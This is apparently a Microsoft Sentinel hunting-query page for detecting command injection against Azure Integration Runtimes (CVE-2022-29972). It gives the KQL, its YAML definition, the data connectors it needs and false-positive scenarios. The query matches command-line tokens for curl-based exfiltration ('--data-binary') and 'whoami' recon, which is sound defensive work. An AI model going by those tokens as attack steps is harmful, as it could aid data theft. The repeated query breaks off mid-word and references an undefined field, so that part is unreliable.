Adversaries may attempt command injection via vulnerable third-party drivers to compromise Azure Integration Runtimes, leveraging network access from Managed VNet or SHIR processes. SOC teams should proactively hunt for this behavior to detect and mitigate potential post-exploitation activity in Azure Sentinel environments.
KQL Query
let parent_proc_list = dynamic(["diawp.exe", "ReportingServicesService.exe", "RSPortal.exe", "RsPowerBI.exe", "taskexecutor.exe"]);
let cmdline_tokens = dynamic(["| curl ", "/c start ", " whoami 2>&1", "-m 5 ", "--data-binary"]);
(union isfuzzy=true
( DeviceProcessEvents
| where FileName =~ "cmd.exe"
| where InitiatingProcessFileName in~ (parent_proc_list)
| where ProcessCommandLine has_any (cmdline_tokens)
| project-reorder TimeGenerated, DeviceName, DeviceId, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
| extend timestamp = TimeGenerated, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName, ProcessCustomEntity = FileName
),
(imProcessCreate
| where ParentProcessName endswith "diawp.exe" or ParentProcessName endswith "ReportingServicesService.exe" or ParentProcessName endswith "RSPortal.exe" or ParentProcessName endswith "RsPowerBI.exe" or ParentProcessName endswith "taskexecutor.exe"
| where ActingProcessName == "cmd.exe"
| where (CommandLine has_any (cmdline_tokens))
| extend timestamp = TimeGenerated, HostCustomEntity = DvcHostname , AccountCustomEntity = ActorUsername, ProcessCustomEntity = TargetProcessName
),
(SecurityEvent
| where EventID == '4688'
| where Process == "cmd.exe" and isnotempty(ParentProcessName)
| extend ParentProcess = tostring(parse_json(parse_path(ParentProcessName)).Filename)
| where ParentProcess in~ (parent_proc_list) and (CommandLine has_any (cmdline_tokens))
| project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
| extend timestamp = TimeGenerated, HostCustomEntity = Computer , AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName
),
(WindowsEvent
| where EventID == '4688' and (EventData has_any (cmdline_tokens) or EventData has_all (parent_proc_list))
| extend CommandLine = tostring(EventData.CommandLine)
| extend NewProcessName = tostring(EventData.NewProcessName)
| extend ParentProcessName = tostring(EventData.ParentProcessName)
| where NewProcessName =~ "cmd.exe" and ParentProcessName in~ (parent_proc_list)
| where (CommandLine has_any (cmdline_tokens))
| extend Account = strcat(tostring(EventData.SubjectDomainName),"\\", tostring(EventData.SubjectUserName))
| extend NewProcessId = tostring(EventData.NewProcessId)
| project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
| extend timestamp = TimeGenerated, HostCustomEntity = Computer , AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName
)
)
| extend NTDomain = tostring(split(AccountCustomEntity, '\\', 0)[0]), Name = tostring(split(AccountCustomEntity, '\\', 1)[0])
| extend HostName = tostring(split(HostCustomEntity, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(HostCustomEntity, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
| extend Process_0_ProcessId = ProcessCustomEntity
| extend Process_0_CommandLine = CommandLineCustomEntity
id: 2d1a3e86-f1a0-49d0-b88a-55789e1d6660
name: Possible command injection attempts against Azure Integration Runtimes
description: |
'This hunting query looks for potential command injection attempts via the vulnerable third-party driver against Azure IR with Managed VNet or SHIR processes as well as post-exploitation activity based on process execution and command line activity
Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972
https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972'
requiredDataConnectors:
- connectorId: MicrosoftDefenderAdvancedThreatProtection
dataTypes:
- SecurityAlert (MDATP)
- connectorId: MicrosoftThreatProtection
dataTypes:
- DeviceProcessEvents
- connectorId: WindowsSecurityEvents
dataTypes:
- SecurityEvent
- connectorId: WindowsForwardedEvents
dataTypes:
- WindowsEvent
tactics:
- Collection
relevantTechniques:
- T1074.001
query: |
let parent_proc_list = dynamic(["diawp.exe", "ReportingServicesService.exe", "RSPortal.exe", "RsPowerBI.exe", "taskexecutor.exe"]);
let cmdline_tokens = dynamic(["| curl ", "/c start ", " whoami 2>&1", "-m 5 ", "--data-binary"]);
(union isfuzzy=true
( DeviceProcessEvents
| where FileName =~ "cmd.exe"
| where InitiatingProcessFileName in~ (parent_proc_list)
| where ProcessCommandLine has_any (cmdline_tokens)
| project-reorder TimeGenerated, DeviceName, DeviceId, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
| extend timestamp = TimeGenerated, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName, ProcessCustomEntity = FileName
),
(imProcessCreate
| where ParentProcessName endswith "diawp.exe" or ParentProcessName endswith "ReportingServicesService.exe" or ParentProcessName endswith "RSPortal.exe" or ParentProcessName endswith "RsPowerBI.exe" or ParentProcessName endswith "taskexecutor.exe"
| where ActingProcessName == "cmd.exe"
| where (CommandLine has_any (cmdline_tokens))
| extend timestamp = TimeGenerated, HostCustomEntity = DvcHostname , AccountCustomEntity = ActorUsername, ProcessCustomEntity = TargetProcessName
),
(SecurityEvent
| where EventID == '4688'
| where Process == "cmd.exe" and isnotempty(ParentProcessName)
| extend ParentProcess = tostring(parse_json(parse_path(ParentProcessName)).Filename)
| where ParentProcess in~ (parent_proc_list) and (CommandLine has_any (cmdline_tokens))
| project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
| extend timestamp = TimeGenerated, HostCustomEntity = Computer , AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName
),
(WindowsEvent
| where EventID == '4688' and (EventData has_any (cmdline_tokens) or EventData has_all (parent_proc_list))
| extend CommandLine = tostring(EventData.Comma| Sentinel Table | Notes |
|---|---|
DeviceProcessEvents | Ensure this data connector is enabled |
SecurityEvent | Ensure this data connector is enabled |
WindowsEvent | Ensure this data connector is enabled |
imProcessCreate | Ensure this data connector is enabled |
Scenario: Scheduled Job for System Maintenance
Description: A legitimate scheduled job runs a script that includes command-line arguments for system maintenance, which may be misinterpreted as command injection.
Filter/Exclusion: Exclude processes associated with schtasks.exe or Task Scheduler and filter out commands that match known maintenance scripts (e.g., systeminfo, diskperf, netstat).
Scenario: Admin Task Using PowerShell for Configuration
Description: An admin uses PowerShell to configure Azure Integration Runtime settings, which may include pipeline commands that resemble injection patterns.
Filter/Exclusion: Exclude PowerShell scripts executed by powershell.exe with known admin tools (e.g., Set-AzIntegrationRuntime, Get-AzIntegrationRuntime) and filter by user context (e.g., domain\admin_user).
Scenario: Log Collection via PowerShell Cmdlets
Description: A legitimate log collection script uses Invoke-Command or Write-EventLog to gather logs, which may trigger the rule due to command-like syntax.
Filter/Exclusion: Exclude processes with logcollection.exe, logparser.exe, or scripts that use Write-EventLog or Get-EventLog.
Scenario: Azure DevOps Pipeline Execution
Description: A CI/CD pipeline runs a script that includes command-line arguments for deploying Azure resources, which may be flagged as command injection.
Filter/Exclusion: Exclude processes associated with azure-pipelines.exe or azure-devops-services, and filter by known pipeline commands (e.g., az pipeline, az deployment).
Scenario: Network Configuration via Command Prompt
Description: A network admin uses netsh or ipconfig to configure network settings, which may contain command-like strings that trigger the rule.
*